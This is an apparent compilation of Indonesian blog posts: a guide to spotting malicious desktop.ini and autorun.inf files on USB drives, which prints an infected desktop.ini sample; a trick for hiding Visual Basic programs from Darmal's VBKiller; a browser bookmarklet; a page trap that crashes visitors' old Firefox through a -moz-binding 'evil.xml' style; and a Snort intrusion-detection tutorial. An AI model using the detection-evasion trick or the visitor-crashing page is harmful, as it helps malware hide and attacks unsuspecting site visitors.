Menyelamatkan Komputer Dari Flashdisk bervirus Dengan Tangan Kosong

Mungkin Setiap kali anda hendak meng-copy data anda dari flashdisk ke dalam computer selalu khawatir kalau-kalau ada virus yang bersarang di flash disk tersebut. Sehingga anda selalu men-scan terlebih dahulu flash disk tersebut sebelum di buka.

Ya memang! Hal itu tidaklah salah. Tapi kadang meskipun sudah di scan berulang-ulang dan tidak ada laporan virus tertangkap, ketika flashdisk di buka tiba-tiba computer langsung restart ulang (alias computer kena virus). Nah ini lah kelemahan antivirus, tidak semua virus di kenali oleh antivirus, mekipun antivirus itu sekelas google, microsoft windows, linux ubuntu, mac os!!! Karena Virus selalu lebih depan dari pada anti virus. dan juga antivirus itu di buat oleh tangan-tangan manusia, yang di program untuk mengatasi kondisi yang telah ditentukan/ di prediksikan oleh programmer! Jadi kalau ada kondisi yang terjadi diluar prediksi programmer…. Ya alamat! Antivirusnya gak bakal ngenalin nih virus.

Nah, dari basa-basi di atas, maka saya tulis articles ini untuk membantu anda mengatasi ancaman virus terutama virus local yang sangat subur di negeri maritim ini.

Ok kita mulai langkah pertama: Setelah anda memasukan flash disk anda ke dalam colokan, silahkan anda buka START >> SEARCH atau click kanan START >> SEARCH… (flashdisk JANGAN langsung dibuka!)

Pada textbox isian “All of part of the file name:” isikan “desktop.ini” Lalu ubah combo “look in”: menjadi lokasi flash disk anda, lalu click SEARCH button Lihat hasilnya, bila anda menemukan file “desktop.ini” pada lokasi flahdisk anda maka kemungkian terdapat virus yang siap beraksi. Namun jika tidak maka kemungkinan virus ada dalam flashdisk namun tidak siap untuk beraksi!

misalkan : ditemukan 3 file desktop.ini di flashdisk anda dan terletak di path “G:/desktop.ini”, “G:/latihan/desltop.ini”,”G:/images/desktop.ini”

Maka anda pilih file yang terletak di “G:/desktop.ini” anda bisa menghapus file ini atau me rename nya, atau boleh juga mengedit isinya.

Mungkin anda bertanya-tanya buat apa saya lakukan ini semua?? Respon yang bagus jika anda bertanya seperti ini! ^_^ (guayaaaaa!!!)

File desktop.ini adalah file yang berfungsi menyimpan settingan folder tertentu. File ini sebenarnya tidak berbahaya, namun berhubung programmer virus pintar-pintar, mereka berhasil memanfaatkan file desktop.ini untuk mendukung aksi program-program virus buatan mereka. File desktop.ini akan dijalankan pertama kali ketika folder/ drive/ hardisk/ flashdisk itu di buka. Jadi pada langkah awal tadi saya melarang anda untuk langsung membuka flashdisk anda sebelum anda membuka SEARCH… selain file desktop.ini ada lagi satu file di gunakan untuk medukung aksi virus-virus mereka yaitu file “autorun.inf” jadi setelah anda men-SEARCH file desktop.ini, maka akan lebih baik bila anda men-SEARCH file autorun.inf lalu lakukan hal yang sama seperti langkah awal terhadap file autorun.inf (jika ketemu)

Code file desktop.ini yang berbahaya (sudah di modif oleh programmer virus)

[.ShellClassInfo] ConfirmFileOp=0 [{5984FFE0-28D4-11CF-AE66-08002B2E1262}] PersistMoniker=file://MSSETUP.T~~\Folder.htt [ExtShellFolderViews] {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

Bila anda menemukan code seperti ini pada file desktop.ini maka sudah jelas bahwa file desktop.ini tersebut berbahaya bagi computer anda. anda tahu kenapa??? Dari code di atas terlihat bahwa file desktop.ini membuka file “folder.htt” yang berada di dalam folder “MSSETUP.T~~” (biasanya folder MSSETUP~~ dalam kondisi tersembunyi /hidden) . Kemudian File “Folder.htt” akan meng-eksekusi file virus yang ada di dalam folder “MSSETUP.T~~” jadi kalo saya gambarkan processnya kurang lebih seperti ini:

DESKTOP.INI/ AUTORUN.INF >> FOLDER.HTT >> VIRUS FILE

Bagaimana sudah jelas kan! Kalo anda menghapus/ me-rename/ meng-edit isi file desktop.ini atau autorun.inf maka sudah jelas file “folder.htt” tidak akan mendapat perintah dari file desktop.ini maupun autorun.inf, begitu juga file virus, tidak akan di eksekusi oleh folder.htt.

Tapi kalo menurut saya sih! Lebih baik di edit saja isi filenya baik file desktop.ini maupun autorun.inf. anda tahu kenapa??

Virus sebelum menginfeksi korbannya (flashdisk/ disket) dia akan mengecek dulu, apakah flashdisk/ disket itu sudah terinfeksi sebelumnya?? Bila sudah terinteksi, maka virus tidak akan menginfeksi korbannya tersebut. Tapi bila belum terinfeksi, maka dia akan meng-copykan dirinya kedalam (flashdisk/ disket) tersebut. Dan biasanya virus akan mengetahui apakah korbannya sudah terinfeksi atau belum, melalui file desktop.ini atau autorun.inf. jadi kalo kita hanya mengedit isinya saja, maka ketika flashdisk anda berada di computer yang terinfeksi virus, dia (virus) akan menganggap flashdisk anda sudah terinfeksi jadi dia (virus) tidak akan meng-copykan dirinya.

Mengakali Darmal’s VBKiller

Program pembunuh proses aplikasi Visual Basic seperti program KillVB, Gasak dan AVBKiller kini satu-persatu berhasil diakali dengan menggunakan trik-trik sederhana. Artikel ini akan menjelaskan cara mengakali program pembunuh proses VB lainnya yang dibuat oleh penggagas trik itu sendiri, Darmal’s VBKiller.
Darmal’s VBKiller seperti yang dikutip dari blognya bung Achmad Darmal di www.friendster.com/darmal mengatakan “Jika program pembunuh proses Visual Basic kesayangan anda sudah tidak mampu, Darmal’s VBKiller hadir dengan formula baru yang mampu mendeteksi trik-trik spoofing/tipuan. Darmal’s VBKiller merupakan tool atau program freeware yang digunakan untuk menghentikan semua proses aplikasi yang dibuat dengan menggunakan bahasa Visual Basic, sekaligus merupakan program pelopor yang mampu menghentikan semua proses program Visual Basic DotNet secara sekaligus.”

Semula memang cukup sulit untuk mengakali aplikasi DVBK ini, pertama kali dicoba dengan cara memanipulasi nama file msvbvm60.dll ternyata tetap dapat terdeteksi, kemudian dengan cara mengubah classname ThunderRT6 dengan memanipulasi isi file msvbvm60.dll juga tidak membuahkan hasil, menggunakan trik yang digunakan Tomero pada artikel Jasakom sebelumnya juga sia-sia. Tapi untunglah satu trik yang gwa temukan ini mampu mengakali deteksi program DVBK, tanpa perlu melakukan trik tipuan-tipuan aneh gwa hanya cukup membuat project tanpa form, hasilnya DVBK gagal mendeteksi program tersebut bweheheh.

Untuk membuat project tanpa Form dapat menggunakan cara berikut ini:

1. Buat Sebuah Project VB (Standard EXE) baru, dalam hal ini memiliki nama default Project1 2. Tambahkan sebuah Module, beri nama module ini mdlMain 3. Klik menu Project kemudian klik Project1 Properties, pada Startup Object pilih ‘Sub Main’ klik OK 4. Hapus Form1, dengan cara aktifkan Form1 kemudian pada menu Project klik ‘Remove Form1′

5. Ketikan kode ini pada module mdlMain :

‘—— start here ——-

Sub Main()

MsgBox “Ini program vb en lagi proses lhoo!”, vbInformation, “Malcoderz”

end

End Sub

‘—— end here ——–

6. Compile project tersebut menjadi file exe dengan cara klik menu File kemudian pilih ‘Make Project1.exe’

7. Jalankan program Project1.exe tersebut dan cobalah deteksi dengan menggunakan program DVBK.

Terakhir ternyata program DVBK mengambil tanda pengenal dari string unik yang digunakan pada Form default Visual Basic yaitu “FORM DC” dan akan mengizinkan setiap Form yang mengandung string “Darmal” pada classname nya bweheheh..

Membuat Hasil Pencarian Gambar Google TERBANG kesana-kemari

Ada hal menarik nich dari Google.com pada menu pencarian gambar. Anda dapat membuat gambar-gambar hasil pencarian anda terbang kesana-kemari^_^ Syaratnya?? Cukup berbekal Browser Mozilla Firefox. Berikut panduannya:

…oO0—( Langkah 1:
Pergilah ke link berikut:

http://images.google.co.id/imghp?ie=UTF-8&oe=UTF-8&hl=id&tab=wi&q=

Link diatas adalah link Google Image Search.

…oO0—( Langkah 2:
 
Pada form isian search, ketik ajah: “neutron” kemudian klik tombol pencarian.

…oO0—( Langkah 3:
 
Copy-Paste script berikut pada address bar anda:
 

javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position= ‘absolute’ ; DIS.left=Math. sin(R*x1+ i*x2+x3)* x4+x5; DIS.top=Math. cos(R*y1+ i*y2+y3)* y4+y5}R++ }setInterval( ‘A()’,5); void(0)

Tekan ENTER!! Kini gambar-gambar di hadapan anda telah terbang kesana-kemari!! ^_^

Mengerjai Pengunjung Situs Pengguna Mozilla Firefox V 2.0.0.7 Kebawah

Pengen ngerjai pengunjung? hehehe.. emangnya cuma pengunjung ajah yang bisa iseng, para admin jangan kalah iseng doong ;p Dengan beberapa script sederhana, anda bisa membuat Browser pengunjung anda mengalami crash. Target kita kali ini adalah para pengguna Mozilla Firefox V.2.0.0.7 kebawah.

 

1. Salin script berikut dan letakkan diantara tag <HEAD> halaman situs anda:

 

<style>BODY{-moz-binding:url(“evil.xml#xss”)}</style>

 

   Misalnya:

 

   <html>
   <head><style>BODY{-moz-binding:url(“evil.xml#xss”)}</style>

   <title>Judul halaman</title>

   </head>
   <body>Isi halaman situs anda…</body>

   </html>

 

2. Salin script berikut, simpan dengan nama evil.xml dan  uploadlah  di  directory

   yang sama dengan halaman yang disisipi script di langkah pertama tadi.

 

 

Cobalah akses halaman jebakan tadi menggunakan Mozilla Firefox V 2.0.0.7 kebawah. Browser anda akan mengalami Crash ^_^. Agar anda tidak mengalami nasib serupa, download ajah versi terbaru Mozilla Firefox.

 

Selamat mencoba..

Monitoring Serangan Hacker Ke Jaringan Dengan Snort

Snort merupakan salah satu software favorit yang digunakan untuk memproteksi network dari serangan hacker. Proteksi tambahan ini cukup memadai untuk menghindari serangan hacker pada umumnya.

‘SNORT’ merupakan salah satu software untuk mendeteksi intrusi pada system, mampu menganalisa ‘real-time traffic’ dan logging ip, mampu menganalisa port dan mendeteksi segala macam ’serangan’ dari luar seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting. secara default nya snort mempunyai 3 hal yang terpenting yaitu :

(1) paket sniffer, seperti tcpdump, iptraf dll 
(2) paket logger, yang berguna untuk paket traffic dll
(3) NIDS, deteksi intrusi pada network.

1.1 Pengenalan

Snort bukanlah software yang sulit, tapi perlu banyak latihan karena banyaknya ‘command-command’ yang harus digunakan, tujuan dari pembuatan artikel ini untuk membuat user lebih mudah untuk mengenali ’snort’.
 

1.2 Instalasi

download paket yang terbaru dari snort.org, saya disini menggunakan snort 2.0.0
 

# wget -c http://www.snort.org/dl/snort-2.0.0.tar.gz

jangan lupa juga mendownload rules terbaru.
 

# wget -c http://www.snort.org/dl/rules/snortrules-stable.tar.gz

extract dan install paket snort
 

# tar -zxvf snort-2.0.0.tar.gz ; cd snort-x.x.x ; ./configure ; make ; make install

untuk lebih lengkap nya silahkan baca ./configure –help  secara default snort akan terinstall di /usr/local/bin/snort

1.3 Paket Sniffer

fyuh, mari coba pelajaran dasar dulu jika anda ingin menampilkan TCP/IP header ke layar ( mis. sniffer mode ), coba perintah ini:
 

# snort -v

 

command di atas akan menjalan snort dan hanya akan menampilkan IP dan TCP/UDP/ICMP header, tapi jika anda mau melihat transit data coba dengan command ini

# snort -vd

instruksi tersebut akan menampilkan transit data, tapi jika anda mau lebih spesifik coba dengan

 

# snort -vde

1.3 Paket logger

ok, command-command di atas mungkin hanya sebagai pengenalan, pada instruksi diatas ada kasus dimana kita tidak mungkin melihat ke layar setiap menit nya oleh karena itu dibutuhkan log, sebelum nya buat direktori ‘log’ di direktori kerja anda sekarang

 

# mkdir -p log # snort -dve -l ./log

Jika instruksi diatas dijalankan, tetapi anda belum membuad direktory log, maka snort akan segera berhenti dengan keterangan ‘ERROR: log directory ‘./log’ does not exist’, jika berhasil, snort akan menyimpan setiap paket ke dalam direktori-direktory IP address, jika sistem anda memiliki beberapa network tetapi anda hanya ingin memonitor network tertentu saja.

 

# snort -dev -l ./log -h 192.168.1.0/24

Rules ini akan menyimpan setiap data link dan TCP/IP header ke dalam direktory ‘log’ dan menyimpan setiap paket dari 192.168.1.0 kelas C network.

 1.4 Mendeteksi ‘Pengacau’ Jaringan

Sebelum ini di bahas, sebaik nya anda membaca manual dari snort.org, http://www.snort.org/docs/writing_rules/chap2.html , disini diminta untuk membuat rules sendiri atau anda bisa memakai rules yang di sedikan oleh snort.org sendiri.

 

# tar -zxvf snortrules-stable.tar.gz

tapi, saya coba membuat rules sendiri, karena saya kurang suka dengan paket dari orang lain, setelah di gunain tapi tidak tahu gunanya buat apa contoh rules sederhana

 

# cd rules; touch avudz.conf # vi avudz.conf alert tcp any any -> ipsaya/29 21 (content: “root”; \       msg: “FTP root login”;) alert tcp any any -> ipprivate/24 22 (msg:”sshd access”;) alert tcp any any -> ipsaya/29 21 (content: “anonymous”; \       msg: “Ada yg Coba FTP server!”;) alert tcp any any -> ipsaya/29 22 (msg:”ada yang login”;) # http://www.linuxsecurity.com/feature_stories/feature_story-144.html

Content digunakan untuk mendefinisikan inputan dari $user, sedangkan msg untuk membuat pernyataan tentang $user yang menggunakan ‘content’ tersebut.

sebelum rules baru ini di jalankan, pastikan anda membuat direktory logging di /var/log/snort
 

# mkdir -p /var/log/snort

 

tetapi jika anda merasa partisi /var anda sudah minim, silahkan buat symbolic link untuk logging, misal

 

# ln -s /home/avudz/snort/log /var/log/snort

 

ok, selesai sudah sekarang coba kita jalankan software nya.

 

# snort -d -c rules/avudz.conf Running in IDS mode Log directory = /var/log/snort Initializing Network Interface eth0

setelah itu silahkan anda coba ftp / ssh ke server anda dari network yang berbeda ( diconfig saya menggunakan ip public), dan pantau traffic nya.

 

# tail -f /var/log/snort/alert

contoh :

 

[**] [1:0:0] ada yang login [**] [Priority: 0] 06/12-05:47:23.911639 202.xxx.xxx.xx:3962 -> 202.xxx.xxx.xxx:22 TCP TTL:64 TOS:0×10 ID:57036 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xAC015F2A  Ack: 0xAD5438B5  Win: 0×3EBC  TcpLen: 32 TCP Options (3) => NOP NOP TS: 16723031 55655688 [**] [1:0:0] Ada yg Coba FTP server! [**] [Priority: 0] 06/12-05:48:24.419800 202.xxx.xxx.xx:3971 -> 202.xxx.xxx.xxx:21 TCP TTL:64 TOS:0×10 ID:57642 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0xAE133FB1  Ack: 0xAFCB3637  Win: 0×3EBC  TcpLen: 32 TCP Options (3) => NOP NOP TS: 16729081 55661127

Ah.. selesai sudah, tinggal tambahin beberapa rules yang dibutuhkan untuk memantau aktivitas ‘machine’ anda misalnya iseng mo monitor irc server, tinggal tambahin di avudz.conf

 

# vi rules/avudz.conf alert tcp ipsaya any -> any 6666:7000 (msg:”CHAT IRC “; flow:to_server,established; content: “NICK “; offset:0; classtype:misc-activity; sid:542;  rev:8;) alert tcp ipsaya any -> any 6666:7000 (msg:”permintaan DCC Chat “; flow:to_server,established; content:”PRIVMSG “; nocase; offset:0; content:” \:.DCC SEND”; nocase; classtype:misc-activity; sid:1639;  rev:3;) # === done === #

Semua config dan rules nya bisa anda pelajari dari file snortrules-stable.tar.gz yang sudah di extract, seperti msyql rules, backdoor rules, ICMP rules, bad traffic rules dll. yang penting adalah mencoba, jangan pernah menyerah! MERDEKA!! =)

Referensi :

1. http://www.snort.org/

2. http://www.snort.org/docs/writing_rules/chap2.html

3. http://marc.theaimsgroup.com/?l=snort-users